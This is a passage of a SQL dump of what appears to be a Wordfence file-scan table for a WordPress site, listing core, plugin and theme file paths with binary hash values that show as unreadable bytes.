�.s���','�zl\Z��C��D���#�a�N��3\'XZ�','',0,'?'),('ef�<�ؐ0аV�K-o','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more.png',0,'����\n�\nm\0;�˫�z','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('ei��y��,:���T�)','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Q�#2Џ���R���','~G)�R���7i-�#��R 9H��ǫ� b','',0,'?'),('ep\r}�u_4������','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����`X�c�b7�qNS�','�M���G�] �?u��gP�p1�,�(�V�^���','',0,'?'),('euo���(���8?5','wp-includes/js/jquery/ui/menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V7g����q�ʤ','O&����x�1�,m��Q�c��YE�#RG���','',0,'?'),('evrӸ>G��kD��/�','wp-includes/wp-includes/js/dist/block-editor.js',0,'L������k�H1��v','L������k�H1��v','���F��%w+7����k	�%���W��1Z�`!p','',0,'?'),('ex���R`���W��eG','wp-includes/wp-includes/js/wplink.js',0,'�7\"U��\"�?���','�7\"U��\"�?���','S\\��	���ٺ�\'?��I��75�{','',0,'?'),('e}0wTnv_�g�~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VE�gO�`#jV�4�C|','�s�c��	;���*r3$X����G8ͬRK�','',0,'?'),('e��G�����W�+S�','wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.css',0,'#YR\nP��>�y�L�,','#YR\nP��>�y�L�,','�4�A�&E(6��~�e�|vH��l�;���R�','',0,'?'),('e��lsUO|�R}ܝ�i','wp-includes/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('e��__�%��x���','wp-includes/class-snoopy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�PQ��I��P4!��','�+�	��uzR�W	QW�|��5��� j[;U|�','',0,'?'),('e�^#|ۍ�TЩ��z','wp-includes/Text/Diff/Engine/xdiff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ�b�t�X8�GX','�[<�0�ą��aD)tJ�h�(C�[uH}sҘi�','',0,'?'),('e�VT��1^2��]��','wp-includes/wp-includes/class-walker-category-dropdown.php',0,'m��s�ny�ld�)��','m��s�ny�ld�)��','�ՠ���P)_�s�)v]��Չ\"����|�','',0,'?'),('f�d�Յs�2��#^�','wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.css',0,'��A�V�t�Fƣ���','��A�V�t�Fƣ���','�2�q{Y�*lX�[q�kd���}�Jp�����','',0,'?'),('f\r�������r�A','wp-includes/wp-includes/js/dist/data.min.js',0,'~Vew����MBE��|�\\','~Vew����MBE��|�\\','|;\n%��A����@P��L���剟�Ib��','',0,'?'),('fp������j�H�\'','wp-content/plugins/wordfence/views/blocking/blocking-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\'N��S.;\r��MT','���2�婢��Mz�֡�XX~��u*<�.v�~','',0,'?'),('f��{\n�,�v�>� E','wp-includes/wp-includes/css/dist/components/style.css',0,'!���{9���YV?\'7�','!���{9���YV?\'7�','���f�4qS�� \\���\'��~v���\Z�h�','',0,'?'),('f�u3\n�M\\�}6*0�','wp-includes/class-wp-customize-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-j�b�4k2�`�s@','s\'�=*�o�[�垙B����i1�c9C�8P3�.��','',0,'?'),('f���N�]h�hIGZ','wp-includes/wp-includes/theme-compat/comments.php',0,'��Ϫ�-�Y�D��s��','��Ϫ�-�Y�D��s��','���A8}���G(oܵ����SQ��:z��b','',0,'?'),('f�霰f؟|h��U�L','wp-admin/includes/ms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�2�r����qh^','��H��\'t�r�\\\\ovV�ߖ�΂���RJVY��p','',0,'?'),('f��ŭ�8��;�slV','wp-admin/js/privacy-tools.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dղ�������5� ',':��s3]9��R�*�w��\n�+#f����ݕ','',0,'?'),('f����B�D�Fr\r\r�','wp-includes/Requests/Transport/fsockopen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�r�����QHˆV','Xi���c�R�)R�Ǡ�.�#`jjŏ�3?','',0,'?'),('f��1̜��#rT�g-�','wp-includes/wp-includes/js/dist/warning.js',0,'�Kn����/���=�','�Kn����/���=�','�v�Q�m�����	�S-��#Qf��7�l3h}|','',0,'?'),('f����e��R�)�','wp-includes/SimplePie/Item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ߟ��	�8����1�V','��Q`�m{�Ҹ\n�ք=��R#�Q����\0K�','',0,'?'),('f�3��Y����T','wp-includes/js/jquery/ui/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�73�l��c�P���R','��{�fT�k��3Ub��	AxT�8?�чaݯ�','',0,'?'),('fֈ�����V�Թ)�9','wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\'牉�TeD�]pCA','J�ϑ߷�`�š+,��jr�#eQ�䫖 ���','',0,'?'),('g�c�����ſ�4^','wp-includes/wp-includes/js/dist/rich-text.js',0,'y$�Bx!�u��񥰂�w','y$�Bx!�u��񥰂�w','��(��/�,gw�&tS��O}���E|�ʂ�','',0,'?'),('g���j\Zr�։�`\Z�*','wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.min.js',0,'�OAZ�n�\0��?!*�W�','�OAZ�n�\0��?!*�W�','q�{2�fX�����JgXC����c�Y�3��','',0,'?'),('g#�,vM������:��','wp-includes/js/jquery/jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�o3�HH��䤱�&','�A���A�H�i�:�B�7����t��OFA','',0,'?'),('g+yr���q����D��/','wp-includes/vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zm���f1q��˴','�nl\Z���h�1he�-�M��5�Nl��bd�Hpz�','',0,'?'),('g+���wJoG���{b','wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�2ң��A�!�V0I','�\"CG9^��ȷ�1��a�?�a�uk`','',0,'?'),('gC1N(�q;3�)h','wp-content/plugins/wp-cerber/assets/flags/ez.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('gE\n���X�F)4\0y�\'','wp-content/plugins/wp-cerber/assets/flags/gt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eQ�2�\Z>���^�','�\ndJj7ؖ�S��y�a�{���Sm�Բ','',0,'?'),('gQir��똿��/!��','wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�A�ݲ�1 \"�Q�','J� �%�D��_su4vs��NB=�c��','',0,'?'),('gr���<�l�<��','wp-content/themes/shootingstar/js/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�tz�4f��6�$','\nå�k��������5����7�[�Y�','',0,'?'),('g|y_�o4\"��X�N���','wp-includes/images/smilies/mrgreen.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('g�\Z���Ş��|q�(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����R�<�nI�<','�e}]T��Y(�u&\r��90+��a�DϮ�#��','',0,'?'),('g�$G\\��;�r���1X','wp-includes/images/wpicons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),('g�f�1�۶�y�;�_','wp-includes/class-wp-http-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@U,�:��-<I�e��','U���缕�H�.c�Sd~�*��)�','',0,'?'),('g�s��)��m��%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`r�ll�3@ޠ!s','F+�RZς�eQ$ep�G%Ev�-�xE','',0,'?'),('g�]e��!^��(PK���','wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�T�}�HW\'<}\\','Z¥|�s�S�8e��3�Eؗ�$����ܜ-h�','',0,'?'),('g��~)�~�s�ʞ��I','wp-admin/includes/class-language-pack-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6d�,�����8E�','�G�y��mT�8=�?�5� �5��y�.�','',0,'?'),('g�?���>�Z�Y�T�Gi','wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php',0,'���:�Z{���5�o','���:�Z{���5�o','���<�s�6��\0,	Ra�uhX��c���','',0,'?'),('g��]bR%� Z��E�','wp-includes/js/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ad�\'w#6?��w�','�����Q� 9I��o��T-�79_!���`','',0,'?'),('g�Ed��1��D}����','wp-includes/js/jquery/ui/autocomplete.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�s(.=����ͪ�','�a�b��u�7���K\'2��V�š�=y��','',0,'?'),('h\n�z�N:�cg�','wp-includes/block-patterns/two-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���8$�6��v','u���]��$)� ���w���5h1#}��8t�\Z','',0,'?'),('hZ[���=���w�r�','wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('h\ZOhl��_��Lm/�','wp-includes/class-wp-customize-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-@�{�p\r���9�u','O�PZ�y�s��6��z��r�4�QN�k��','',0,'?'),('h d��껅2��_�r','wp-includes/functions.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GQ\0���[��� �9','E�Z�H����Ruj�X{L��oy�X`	Y��鈨','',0,'?'),('h0X-�i����^�G`8','wp-includes/pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pq�����EyJ�$��','�Y�֋Y\0+IBNvk�dE&��Bp����F�','',0,'?'),('h4���#3�`�-݈�\"�','wp-admin/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��,���g;ꙴ','�C��q��N,�`v�S��*���Z[�`���m�','',0,'?'),('h@Z�%�R�F�;ti\\m','wp-admin/css/login-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��u�\n�xv6�','��Vk�\n&B����S2�w@��UG�ƺ����?�','',0,'?'),('h]hb%����VC�X�','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/link-icons/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z\nG]L(�<ĕ�8\"9�','�Xyf%�_p�B+��ᚁ\0���\0���','',0,'?'),('h|hE��f:Ʊ2��~','wp-admin/network/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','堷ȹ����H^r�','�f�kL��\Z�)h/F_��M�9�j���V�','',0,'?'),('h���!|�c+�sF�#NW','wp-includes/wp-includes/js/jquery/ui/effect-fold.js',0,'��}:h�B�կ}z�x�','��}:h�B�կ}z�x�','�����񀨯n�\r�S�/<���b���ե]Na�','',0,'?'),('h��~cTOo�y4|','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('h�<�]���OpNCƴ�','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w���Z�\\��;�O�','�|�.h��.��+\r	1�C\'�m��h$x(���','',0,'?'),('h���A_��q�w�T��','wp-includes/wp-includes/class-wp-user-meta-session-tokens.php',0,'�8/\'\0�\0��vSL-G\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('h�㤖1^\Z�?�U�','wp-includes/wp-includes/Requests/Exception/HTTP/414.php',0,'��]U�@���)��#h','��]U�@���)��#h','��H������i���c�!��I).eh������','',0,'?'),('h���QK�V<r:Mg_��','wp-includes/js/dist/format-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�íO�j�#��}s�j','��\0�Ŧ��{S\ZE�8��8�.�*�_�','',0,'?'),('i	�?N��ZaiBi*�','wp-includes/wp-includes/js/mediaelement/wp-mediaelement.js',0,'�(D�q�|�����','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('i����kmCx�ʷ��','wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��.��q�:�j��R','u�a�v�R���+We\r�T�J%�\"�\r7�f���','',0,'?'),('i��;�&��o�?','wp-includes/IXR/class-IXR-base64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),('ia{�-��\Z�ؙo��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�<��܎�s��9','��Q�\'�r�� �t7��=s*a`<�z�o�_','',0,'?'),('ii�\"o�C����`','wp-includes/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('i�g�W&_B~�\r�Ȟ','wp-includes/wp-includes/js/swfupload/swfupload.js',0,'��#����9��>&YRg','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('i�-��X�8V[~E�','wp-admin/css/install-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�H�a})Β��;��~s','�3�&d)��s\Z<7æa�v�y�7�v�~����','',0,'?'),('i�\\����=X�h$','wp-admin/js/language-chooser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӥ�ku��lLS�','��r4��i���j�\"܈�����6���&','',0,'?'),('i�k���C��T,�','wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�h��2aE��0','�D�:�]踝z����w%[�j�o����X`�','',0,'?'),('i�m�rO��:zi|','wp-includes/wp-includes/js/crop/marqueeHoriz.gif',0,'�̮����;���Lo\n','�̮����;���Lo\n','|���S�e��|.���/�Q�Y��W�}(','',0,'?'),('i�Թ/��s�(?�z','wp-content/plugins/wp-cerber/assets/flags/pl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�؍�J������S�$','�-v_ꉱ�N��M+o����	�cx��D]�','',0,'?'),('i�rHFn���A\n�AS�=','wp-content/plugins/wp-cerber/assets/select2/dist/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�AO���K��o�t�','�������lN_-�\n��|\r蒝vy�$k','',0,'?'),('j&�V1���6�4����','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r��9 �#��{�','ᄆ��n�ѿ�0c~N��r��Au�g~Δ���I','',0,'?'),('j)^��@��\'��[','wp-includes/wp-includes/js/tinymce/plugins/media/plugin.js',0,'�#@,�4dG��M','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),('j+f��	��.��','wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php',0,'[Rz@�MMQmr���','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),('j+��\0,�_/H���I','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',0,'��V�A�ݲ�1 \"�Q�','��V�A�ݲ�1 \"�Q�','J� �%�D��_su4vs��NB=�c��','',0,'?'),('j3]p���B���R!I�q','wp-content/plugins/wp-cerber/assets/flags/cr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v.\Zg����9V��','t~���� V�7�V���L�$D\0��p;\"�\ZX��1','',0,'?'),('jQ���e���;�e','wp-includes/css/wp-pointer-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�d�\\n�Ue�S@','������7�Z%\0L�|��I�`��?{hl�G�\\','',0,'?'),('jmE��AX�uw�>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f�+�#k�','����z\Z��O��3΢����}*�i�u`�!','',0,'?'),('j~�)ũ���/�Nt�F','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/link-icons/icons/pdf.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�XCU@�\'6�@O�D:','g��:���#!�u��<n5�W�6��%/��J��','',0,'?'),('j�䱋����%���]�','wp-includes/class-wp-xmlrpc-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�`\'S���̽�','�I.��B�Ad<3KE�BB���Ya��F�KR~','',0,'?'),('j����p�\0Z��','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Z�xu�t�\n��x�','��p!ŗ$�����<�#|j��f�#�-z�','',0,'?'),('j���)n�Q8ޮ�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�v��\\W�%A�E6$�','���G0n�eiLՀ�P���}�9� R��rP��','',0,'?'),('j����5F+���o','wp-includes/images/crystal/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),('j�a$�	?h��`�R�','wp-content/plugins/wordfence/css/wf-adminbar.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0����\"CϷ�Tb�','h�S䘷*g�5��)!���}�Bl�N�E�','',0,'?'),('j� �i4�A����L,','wp-includes/wp-includes/js/dist/editor.min.js',0,'ũ8��6uj(X4ѨÎ�','ũ8��6uj(X4ѨÎ�','������U:W�{\n�b)SN��.=}c�A','',0,'?'),('j��4-�O Մ��rL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$1�D�\'w��m���','E&&\n��a���~�b+\Z���)j��M�p��M�','',0,'?'),('j�gs�66�$��8*�E�','wp-includes/class-wp-dependency.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NV}��b.\'�5m','�[�4M�,�4�ܓ�x�wBB̕=Bg��}I�l�','',0,'?'),('j›��(˥e_�(','wp-content/themes/sg-window/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�NK!�KE~�1	R-F','�Cم�_f;w�%H=�2—�&*>h�MgK�����','',0,'?'),('k���$6O��-N�x�','wp-includes/js/tinymce/plugins/charmap/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=B�쟄��P\rL��','•�x[�G��-�90b.z�G��az�>�r','',0,'?'),('k%�\r0̯�IN6�D\'�y','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�+�ک�d�ݬ@��','w�bj�Y����S����tc��� ��I��dQ','',0,'?'),('k6���*���H�	�u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�}��I�F�ty�','p�\r�G$��M��,�F7\rC�\\^��,�[tdΎ','',0,'?'),('k?.V�(���G�J��','wp-includes/wp-includes/images/icon-pointer-flag-2x.png',0,'���2�b��&�Z�r','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('kM������̙Ysp','wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����D�G��','����+��*ە�ۦE�J�%\"���HID�-�','',0,'?'),('km�|��Kma0�\"*�k','wp-admin/js/tags-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�ͨ�p���d����','�r0�\"��l\n�E�ݴ�*�7��vL�{d','',0,'?'),('k}:����VN����G','wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>P��H�e6�[GF�5�','��q!�홐��%ހP٧��H��r�.�L��~','',0,'?'),('k��1���/�͓ݐ%=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dq�d6�+\"��U���','�I����s;֮����i����k���E�@�)','',0,'?'),('k�������1]��c�','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/buttons/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V	+T$��	S���','��	��a�_��2�N�QiहQp��Or�|�','',0,'?'),('k�و;�}�cL`t܌','wp-includes/wp-includes/js/wp-backbone.min.js',0,'�K�/�����7���b','�K�/�����7���b','���9J7�A���G���uq!@/nS]�<o�e�}�','',0,'?'),('k��B˞�b=y��','wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�λ���4S�����',' BN+3Yj��}�Te�:�g\0t&�*�Į�i�','',0,'?'),('k“��U/�^���� ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��֟0}_���','�O�+�WE��(\Zvl�%`���¢�x�6��n� ','',0,'?'),('kۚ��	#푥s�ePY�','wp-content/plugins/wp-cerber/assets/flags/kn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�\Z�׋��%q�$�','�g-)�ASZ�v�Z��-<��.aءU�ن+�','',0,'?'),('k�\'\n+&=��n`�3�','wp-includes/js/dist/dom-ready.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*@o�\"wŹ��D�','6�ݨ(�\\Xp�b%�~�D������&1yW�','',0,'?'),('k�Hy�^�,�@��zM','wp-content/themes/sg-window/sidebar-top.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɺdvE\'Gn��a��@','ML�q�ȅQ���\"�e!F�^��T#���]-','',0,'?'),('k����@)i�|.��$�','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/object.gif',0,'�rdP�E}u\n/M�A�� ','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),('ltvZ��x�]BWh*','wp-includes/wp-includes/js/jquery/ui/draggable.js',0,'��:2��g9�tL�D�','��:2��g9�tL�D�','��Cu�o.t�?�xd�x�CK�6�Ηp_�','',0,'?'),('l\r��l�\0W1�`���','wp-includes/wp-includes/blocks/audio/block.json',0,'�8}(�iC-.�w','�8}(�iC-.�w','�Pp��6��R���{��PeP�Q\r�k7�_?�','',0,'?'),('l=��B�������','wp-includes/wp-includes/ID3/module.audio-video.riff.php',0,'�\"���:\'9���P�','�\"���:\'9���P�','��}\",.~�~��s����U�5�~�`x��P�','',0,'?'),('lDW�qa�+���V�','wp-content/themes/sg-window/img/icons/wordpress.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*��v�(:���','hz���(qS)p@��[w���n�l‡��B','',0,'?'),('l/\n�Ԁ�W�ͱ-c�','wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d���j�F����3','5���s�	��O>���{��ĩ�2�!�.�1��','',0,'?'),('l9��=��h�,>���&','wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0I����H���pz��','\n�ö\'������%���?��Zyޘ{���','',0,'?'),('lI\r_�/���,:j*:T','wp-content/themes/sg-window/customize-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','±�oK汨��\'ғ(N','�-���$1B܅���)��dɿΟ,�\'V�r\n�','',0,'?'),('lZ�q�#eS%s��7Y�','wp-includes/js/dist/notices.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P���L�O9h�X�Y�','���A�!d�K2��VԱIiSlz\r7�','',0,'?'),('l�����w��_�x{?','wp-includes/wp-includes/customize/class-wp-customize-cropped-image-control.php',0,'G�p[�q}y��1�','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('l�\Z��X\0R��÷6�','wp-content/themes/sg-window/inc/js/meta-box-image.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i g4Xo������d','S�*���bZ�:9�U�����i�G��*T�','',0,'?'),('l��h����m�\\�{�','wp-includes/wp-includes/js/dist/core-data.min.js',0,'Th�;��ͯ�|!fE�\"\n','Th�;��ͯ�|!fE�\"\n','��(��o{il�A���	\'�Z�E�I�d/&�','',0,'?'),('l�4�ݨHqʺt���ݖ','wp-includes/wp-includes/js/dist/list-reusable-blocks.js',0,'^��\'}�w����0b','^��\'}�w����0b','��\\o�U0.RoIOqe?�~�`ٰ�E�i�.','',0,'?'),('l�(E���t�m:8�I�','wp-content/themes/sg-window/inc/customize-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�Ɨ�z�]�Kt��B','���@�wm��2�O��ךoK�%�R!�\"��|�','',0,'?'),('mD��T�ms���A�}','wp-includes/certificates/ca-bundle.crt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M��T�[чB��','�����aP����P\0�v?6,�̟An���','',0,'?'),('m;t�<0|x��<�����','wp-includes/wp-includes/js/jquery/ui/controlgroup.min.js',0,'�##�=�F=��\\�v','�##�=�F=��\\�v','��>733hE}���z�[)�e�Z0�ߨ!�$/Ӿ�','',0,'?'),('mA�p��	1��G�U/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�׋�Po�v��`�','�Zu�E-�-߈��������S�C��di5$r','',0,'?'),('mA��Y����Rb|�S�','wp-includes/ms-default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�%�M�A�b���Y�','_%������ ��+�g��`���}<���','',0,'?'),('mE���\\�)��o�','wp-includes/js/jquery/ui/spinner.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�������<8z�+','�5��bW���O��h���_�_��� I��','',0,'?'),('mY����}ɽ��?','wp-includes/js/jquery/jquery.ui.touch-punch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),('mx�&L�KQ�M���','wp-content/plugins/wp-cerber/assets/flags/va.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','od�ل�0Bߵ�߽s','�[•=�px	��LE�^�4|��~30yx\Z�&�','',0,'?'),('m��-\Zm1����w��','wp-includes/js/jquery/ui/sortable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��:�7)�r�ӈ�k',')��jjc�D�߰�%^B���� �&�ٶ�Ƀ�','',0,'?'),('m�`ᇛ�MP����8-','wp-content/themes/shootingstar/js/scroll-to-top.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�+J,�ul֫�/��','�u?��m,GV�`Hd�\rXߟ�)�C�-;�\r7�','',0,'?'),('m���S� �6{~��@','wp-includes/wp-includes/widgets/class-wp-widget-archives.php',0,'�POůJ�~�l�.�J','�POůJ�~�l�.�J','�o���`|?�0�5���q����_	